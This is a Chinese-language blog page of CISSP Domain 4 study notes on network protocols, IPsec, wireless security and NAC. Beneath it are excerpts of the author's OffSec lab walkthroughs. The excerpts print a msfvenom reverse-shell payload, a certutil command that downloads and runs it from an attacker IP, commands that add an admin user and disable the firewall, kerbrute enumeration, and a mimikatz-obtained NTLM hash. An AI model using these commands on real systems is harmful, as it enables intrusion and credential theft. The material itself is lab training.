CISSP EXAM Outline - Domain 4

-

Communication and Network Security

通信與網絡安全



4.1 評估和實施網絡架構中的安全設計原則 Assess and implement secure design principles in network architectures

  • 開放系統互連 (OSI) 和傳輸控制協議 / 互聯網協議 (TCP/IP) 模型 Open System Interconnection (OSI) and Transmission Control Protocol/Internet Protocol (TCP/IP) models
    • 允許控制吞吐量、處理線路噪聲以及各種其他電氣接口和信號要求的電氣規範、協議和標準屬於 OSI 第一層。
      • EIA/TIA-232 & EIA/TIA-449
      • X.21
      • HSSI
      • SONET
      • V.24 & V.25
    • ARPRARP、L2F、L2TP、PPTP 和 Frame Relay 屬於 OSI 第二層。
      • SLIP
      • PPP
      • ISDN
      • OUI 組織唯一標示符, 即前六碼 MAC, 網卡製造商
    • ICMP、IGMP、RIP(距離矢量)、IPSec 和 NAT 屬於 OSI 第三層。
      • OSPF(鏈路狀態)
      • BGP
      • IP
      • IPX
      • SKIP
    • SSL、TLS、SPX 和 TCP/UDP 屬於 OSI 第四層。segments(TCP)、datagrams(UDP)sequencing, and error checking 分段、排序和錯誤檢查皆屬於 OSI 第四層。
      • TCP 表頭的最小長度是 20 bytes.
      • UDP 表頭的長度是 8 bytes.
    • 管理單工、半雙工和全雙工通信屬於 OSI 第五層。
      • NFS(TCP 2049) : 文件共享使用
      • SQL
      • RPC
    • JPEG/MPEG、ASCII 和 MIDI 屬於 OSI 第六層。
      • EBCDICM
      • TIFF
    • SMTP/POP3/IMAP(TCP 143)、HTTP 和 SNMP 屬於 OSI 第七層
      • FTP/TFTP(UDP 69)
      • LPD(TCP 515) : 列印使用
      • Telnet
      • EDI
      • NNTP
      • S-RPC
      • SET
      • SMTP 協議不保證服務器之間的 TLS 加密,使得客戶端和服務器之間的 TLS 或 SSL 是選擇性與無法強制性措施。加密電子郵件內容是提供郵件傳輸機密性的最佳作法
    • 數據流(Data streams)與應用層(7)、表示層(6)和會話層(5)相關聯。
    • OSI 七層 :
      1. Physical
      2. Data Link
      3. Network
      4. Transport
      5. Session
      6. Presentation
      7. Application
  • 互聯網協議 (IP) 網絡(例如,互聯網協議安全 (IPSec)、互聯網協議 (IP) v4/6) Internet Protocol (IP) networking (e.g., Internet Protocol Security (IPSec), Internet Protocol (IP) v4/6)
    • RFC 1918 將三個地址範圍定義為私有(不可路由)IP 地址範圍:10.0.0.0/8、172.16.0.0/12 和 192.168.0.0/16。
    • 以太網使用帶有衝突檢測的載波偵聽多路訪問 (CSMA/CD) 技術。當檢測到衝突並發送阻塞信號時,主機會在嘗試重新傳輸之前等待一段隨機時間。
    • IPsec 或 Internet 協議安全性可以使用公鑰加密技術提供加密、訪問控制、不可否認性和消息身份驗證。它不提供授權、協議融合、內容分發、微分段、消息完整性檢查和網絡虛擬化。
    • IPSec ESP 的傳輸模式(Transport mode)加密 IP 數據包數據,但不加密數據包標頭。隧道模式(Tunnel mode)對整個數據包進行加密並添加新的標頭以支持通過隧道傳輸。
    • 距離矢量協議(Distance-vector protocol) : 使用包括到遠程網絡的跳躍方向和距離在內的指標來做出決策。
    • PPTP、L2F、L2TP 和 IPsec 是最常見的 VPN 協議。
    • SPML : 將服務信息發送給第三方組織。服務供應標記語言 (SPML) 是一種基於 XML 的語言,旨在允許平台生成和響應供應請求。
    • 安全內容自動化協議 (SCAP) 是一套用於處理漏洞和安全配置信息的規範。 NIST 提供的國家漏洞數據庫使用 SCAP。
    • DHCP :
      • UDP 67 : 接收客戶端通信
      • UDP 68 : 客戶端請求的源端口(Port)
  • 安全協議 Secure protocols
    • PPP 服務器使用質詢握手身份驗證協議(Challenge-Handshake Authentication Protocol) CHAP 來驗證遠程客戶端。它對用戶名和密碼進行加密,並在連接時使用防止重放攻擊的技術執行定期重新身份驗證。
    • 藍芽不提供強加密,因此只能用於非機密活動。藍芽 PIN 是四位數的代碼無法擴展,通常默認為 0000, 為了安全強烈建議更改預設值。關閉發現模式確保設備不處於發現模式有助於防止藍芽攻擊。
    • bluejacking 攻擊是對藍芽的無線攻擊,bluejacking 攻擊中最常見的設備是手機。
    • bluesnarfing 攻擊是對藍芽的一種數據竊盜。
    • bluebugging 攻擊是對藍芽的一種竊聽, 與駭客漏洞利用控制裝置的一種攻擊。
    • 密碼驗證協議 (PAP) 是 PPP 的標準化驗證協議。 PAP 以明文形式傳輸用戶名和密碼。它不提供任何形式的加密。它只是提供了一種將登錄憑據從客戶端傳輸到身份驗證服務器的方法。
    • S/MIME 支持簽名郵件和安全信封方法。提供了兩種主要的使用模式 : (1) 提供完整性、發件人身份驗證和不可否認性的簽名消息;(2) 提供完整性、發件人身份驗證和機密性的封裝消息模式。
    • 安全文件傳輸協議 (SFTP) 專為加密文件傳輸而設計。
    • WiMax 的 IEEE 標準是 802.16
    • DNP3(分佈式網絡協議): 一種多層協議,主要用於電力和水務公用事業和管理行業。它用於支持數據採集系統和系統控制設備之間的通信。DNP3 是一個開放的公共標準。DNP3 是一種多層協議,其功能類似於 TCP/IP,因為它具有鏈路、傳輸和傳輸層。
    • WPA2 的 CCMP 加密方案基於 AES。
    • WPA3 的新 SAE(平等同時驗證)模式改進了 WPA2 的 PSK 模式,允許在沒有企業用戶帳戶的情況下在客戶端和無線網絡之間進行安全驗證。



  • 多層協議的含義 Implications of multilayer protocols
    • 多層協議的共同缺點 :
      • 隱藏在分層協議中的流量可以繞過過濾器
      • 允許或創建隱蔽通道
      • 允許繞過網段設置的邏輯邊界
    • 多層協議的共同優點 :
      • 可在更高層使用各種協議
        • 例如 : [乙太網 [IP [TCP [HTTP [FTP]]]]], 將 FTP 封裝在 HTTP 中
      • 加密可包含在各個層中
      • 支持複雜網路結構中的靈活性和彈性
    • 封裝(encapsulation)既是多層協議的好處,也是潛在的有害影響。
  • 聚合協議(例如,以太網光纖通道 (FCoE)、互聯網小型計算機系統接口 (iSCSI)、IP 語音 (VoIP)) Converged protocols (e.g., Fiber Channel Over Ethernet (FCoE), Internet Small Computer Systems Interface (iSCSI), Voice over Internet Protocol (VoIP))
    • 乙太網光纖通道 (FCoE) 是一種聚合存儲協議。
    • 乙太網基於 IEEE 802.3 標準。
    • FCoE 乙太網光纖通道允許通過以太網網絡進行光纖通道通信,從而允許使用現有的高速網絡來傳輸存儲流量。這避免了為光纖通道實施定制電纜設備的成本。
  • 微隔離(例如,軟件定義網絡 (SDN)、虛擬可擴展局域網 (VXLAN)、封裝、軟件定義廣域網 (SD-WAN)) Micro-segmentation (e.g., Software Defined Networks (SDN), Virtual eXtensible Local Area Network (VXLAN), Encapsulation, Software-Defined Wide Area Network (SD-WAN))
    • VXLAN 用於可擴展的虛擬 LAN,而不是 WAN。
    • VXLAN 使兩個不同的網絡位置看起來位於同一網段。
    • VXLAN 在第 3 層網絡上建立第 2 層連接的隧道,實質上是將 LAN 擴展到它可能無法在其上運行的距離或網絡上。
    • 軟件定義網絡 (SDN) 的應用程序平面(application plane)是運行應用程序的地方,這些應用程序使用應用程序編程接口 (API) 與 SDN 就所需資源進行通信。
    • SD-WAN :
      • 網絡使用預定義的規則來優化性能
      • 網絡進行持續監控以支持更好的性能
      • 網絡使用自學習技術來響應網絡中的變化
  • 無線網絡(如 Li-Fi、Wi-Fi、Zigbee、衛星) Wireless networks (e.g., Li-Fi, Wi-Fi, Zigbee, satellite)
    • LEAP 是輕量級可擴展身份驗證協議,是一種 Cisco 專有協議,旨在處理 TKIP 問題。不幸的是,LEAP 也存在嚴重的安全問題,不應使用。任何現代硬件都應該支持 WPA2 和 PEAP 或 EAP-TLS 等技術。使用 WEP(WPA 和 WPA2 的前身)將是任何網絡安全性的一大退步。
    • LiFi 使用可見光和紅外光高速傳輸數據。雖然 LiFi 部署尚未廣泛開展,但它們在一些實際應用中已取得初步成功。 LiFi 和 WiFi 都可以提供寬帶速度,而 WiFi 與 LiFi 不同,Wi-Fi 容易受到電磁(EM)干擾。
    • Zigbee(藍芽傳輸) : 專為低功耗的物聯網網絡而設計, 適合可以在建築物或房間之間以相對較短的距離相互連接的小型低功耗解決方案。
    • ad hoc mode : 直接透過 WIFI 方式連接兩個客戶端。
    • 正交頻分複用 (OFDM) 無線頻率訪問方法以最小的干擾提供高吞吐量。
    • 戰爭駕駛(War Driving) : 使用檢測工具尋找無線網路信號的行為
    • 無線網絡的信號強度以及可訪問的位置,應考慮三個重要事項 :
      • 天線放置 Antenna placement
      • 天線類型 Antenna type
      • 天線功率水平 Antenna power levels
  • 蜂窩網絡(如 4G、5G) Cellular networks (e.g., 4G, 5G)
    • 加密、基於設備的身份驗證(例如,使用證書)和基於 SIM 的身份驗證都是 4G 連接解決方​​案的常見選項。
    • 5G 技術包括新的相互身份驗證功能和對用戶身份的額外保護兩個主要安全優勢。
  • 內容分發網絡 (CDN) Content Distribution Networks (CDN)




4.2 安全的網絡組件 Secure network components

  • 硬件操作(例如,冗餘電源、保修、支持) Operation of hardware (e.g., redundant power, warranty, support)
    • UTP 對 EMI 的抵抗力最低,因為它是非屏蔽的。 Thinnet (10Base2) 是一種屏蔽 EMI 的同軸電纜。 STP 是一種屏蔽形式的雙絞線,可抵抗 EMI。光纖不受地面電磁干擾的影響。
  • 傳輸媒介 Transmission media
    • 10Base2 : 185 米
    • 10Base5 : 500 米
    • 5-4-3 : 5 個段, 4 個設備(中繼器), 填充 3 個
  • 網絡訪問控制 (NAC) 設備 Network Access Control (NAC) devices
    • NAC 的目標
      • 防止/減少零日攻擊
      • 在整個網路中實施安全策略
      • 使用標示執行訪問控制
    • NAC 可通過接入前控制和接入後控制來實現
      • 接入前控制(pre-admit) : 要求系統與網路通訊前滿足所有安全條件(例如安裝防毒軟體與 Hotfix)。
      • 接入後控制(postadmission) :允許和拒絕基於用戶的活動的訪問, 用戶活動基於預先設定好的授權矩陣。
    • CAM Table : 全名是Content-addressable Memory Table,也就是所熟知的Mac table, 啟用 port security 可以防止在單個 Port 上使用大量 MAC 地址來防止 CAM 表氾濫
    • 狀態檢測防火牆(Statefull inspection firewalls)評估網絡流量的狀態或上下文。通過檢查源地址和目的地址、應用程序使用情況、來源以及當前數據包與同一會話的先前數據包之間的關係,狀態檢測防火牆能夠為授權用戶和活動授予更廣泛的訪問權限,並主動監視和阻止未經授權的用戶和活動。
  • 終端安全 Endpoint security




4.3 根據設計實施安全通信通道 Implement secure communication channels according to design

  • 語音 Voice
  • 多媒體協同 Multimedia collaboration
  • 遠程訪問 Remote access
  • 數據通信 Data communications
    • 同步通信依賴於計時或時鐘機制。異步通信依靠停止和開始分隔符位來管理數據傳輸。
    • FHSS : 旨在通過多個頻率來幫助最小化干擾。最大限度減少干擾。
    • OFDM : 完全不會相互干擾。
  • 虛擬網絡 Virtualized networks
    • 永久虛電路(PVC)可以描述為始終存在並等待客戶發送數據的邏輯電路。
    • PVC 每次連接時都使用相同的基本參數或虛擬路徑重新建立鏈路。
  • 第三方連接 Third-party connectivity




ISC2 連結 : CISSP Exam Outline (isc2.org) 

留言

張貼留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

-
圖片
Challenge 0 - Secura(2) 下一步就是先想辦法進入第二台 .96 Rustscan 看一下,看來這一台的梗在 3306 MySQL 上 測試了一下遠端 IP 被阻擋進入 MySQL 從已經打入的第一台 .95(SECURE) 搭建 chisel 去登入 .96 的 MySQL 看來也不行 先在第一台 .95 建立一個使用者 aries 與密碼 Oscp#1234 net user aries Oscp#1234 /add 加入到本機的 administrators 群組 net localgroup administrators aries /add 開啟 RDP reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 關掉 firewall netsh advfirewall set allprofiles state off RDP 進去開始枚舉,└─$ xfreerdp -v:192.168.204.95 -u:aries -p:'Oscp#1234' +clipboard -cert:ignore -drive:aries,/home/kali/lab0/95 網域簡名 SECURA 網域全名 secura.yzx 這一台有跑 PostgreSQL DB 跑在本機的 127.0.0.1 15432 Port 查找 *.kdbx & *.zip 發現 PostgreSQL 帳號密碼 postgres:appmanager 測試帳號密碼有效 甚麼都不能執行也找不到有用的資訊 暫時沒有方向,回到 .97 先枚舉使用者看看 ./kerbrute_linux_amd64 userenum --dc 192.168.204.97 -d secura.yzx -o kerbrute-user-enum xato-net-10-million-usernames.txt 獲得使用者帳號 michael、charlotte、secure、administrator、era 這幾個使用者都沒有 ASREP ./GetNPUsers....
閱讀完整內容

濫用 Windows 庫文件(Library File)

-
圖片
 濫用 Windows 庫文件(Library File) 首先在 Kali 上設置一個 WebDAV 共享,透過 pip3 先行安裝 指令 pip3 install wsgidav 建立一個路徑 /home/kali_r/webdav 目錄以用作包含 .link 文件的 WebDAV 共享 先在此路徑下建立一個 test.txt 文件 mkdir /home/kali_r/webdav & touch /home/kali_/webdav/test.txt 接下來將從 /home/kali_r/.local/bin 目錄運行 WsgiDAV。整個過程中使用 wsgidav 作為啟動服務器的命令。 提供的第一個參數是 --host,它指定要提供服務的主機 我們將監聽所有帶有 0.0.0.0 的接口 接下來使用 --port=80 指定偵聽端口,並使用 --auth=anonymous 禁用對共享的身份驗證 最後使用 --root /home/kali_r/webdav/ 設置為 WebDAV 共享目錄的根目錄 指令 └─$ /home/kali_r/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali_r/webdav/ netstat 一下可以看到已經有 listen 80 Port 用瀏覽器開啟測試,可以看到前面建立的 test.txt 接著使用 xfreerdp 登入到某台 windows  帳號 : offsec、密碼 : lab、掛載本機的 /home/kali_r 為遠端的網路磁碟機 aries └─$ xfreerdp -v:192.168.203.194 -u:offsec -p:lab -drive:aries,/home/kali_r 使用該台機器已安裝的 Visual Studio Code 來進行編輯接下來要用的攻擊檔案 建立一個新的文字檔 建立如下內容檔案 下面的列表包含庫文件的命名空間 。這是從 Windows 7 開始的庫文件格式版本的命名空間。該列表還包含庫描述的結束標記。涵蓋的以下所有標籤都將添加到 libraryDescription 標籤內。 <?xml version="1...
閱讀完整內容

Challenge 0 - Secura(1)

-
圖片
 Challenge 0 - Secura(1) Offsec 在九月底的時候 LAB 推出了 Challenge 0,會取名 0 應該是相對簡單的,打打看吧 環境說明共三台機器,簡單掃了一下  - 95 : Web Server 感覺像是進入點  - 96 : DB 伺服器  - 97 : DC 95 8443 Port 打開是 AppManager14 版本是 14710 使用預設帳號密碼 admin:admin 可以直接登入 跑了一下 Metasploit 與 Exploit 針對 14700 的漏洞利用看來都沒有成功 5001 / 參考 Pentest Everything :  https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/windows/metallus 自己建立一個 payload,└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -b '\x00\x01\x0d' -f exe -o revershell.exe 接著在 Admin --> Upload Files / Binaries 頁面選擇 [ Upload Script to <Product_Home>/working ] 設定執行的檔案為 cmd.bat 建立一個 cmd.bat,內容如下 certutil.exe -f -urlcache -split http://192.168.45.179/lab0/95/revershell.exe c:\windows\temp\revershell.exe && cmd.exe /c c:\windows\temp\revershell.exe 上傳 cmd.bat 執行該 Script,成功拿到 Rever Shell whoami 看一下,進來就是 nt authority\system 直接拿 flag 跑一下 mimikatz.exe administrator NTLM HASH a51493b0b06e5e35f855245e71af1d14 測試看看 e...
閱讀完整內容